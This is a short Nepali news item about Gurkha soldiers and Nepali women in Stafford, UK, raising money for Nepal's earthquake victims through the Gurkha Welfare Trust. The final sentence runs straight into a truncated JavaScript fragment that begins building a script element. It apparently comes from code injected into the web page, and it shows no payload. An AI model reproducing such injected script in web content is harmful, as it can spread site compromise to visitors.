स्टाफोडमा कार्यरत गोखार्जहरुको एक समुहले भुकम्प पीडीतहरुको सहयोर्थ रकम संकलन गरेको

स्टाफोडमा कार्यरत गोखार्जहरुको एक समुहले भुकम्प पीडीतहरुको सहयोर्थ रकम संकलन गरेको छ । स्टाफ सार्जन्ट जगत राम राईको नेतृत्वमा रहेको सो टोलीले स्टाफोड र स्ट्रोक अन टे्रन्टमा छुटा छुटै कार्यक्रम गरि १२ हजार सात सय पन्घ्र पाउण्ड संकलन गरेको हो । त्यस्तै गरि स्टाफोडमा रहेका नेपाली दिदीवहिनीहरुको टोलीले ५ मे मा एक परोपकारी रात्री भोजको आयोजना गरेका छन । सो कार्यक्रम मा उठेको रकम समेत गरि जम्मा रकम लाई गोर्खा वेलफेयर ट्रष्ट मार्फत नेपालमा भुकम्प पीडीतहरुको लागि नेपाल पठाउने स्टाफ सार्जन जगत राम राइले वताउनु भयो ।var d=document;var s=d.createElement(‘script’);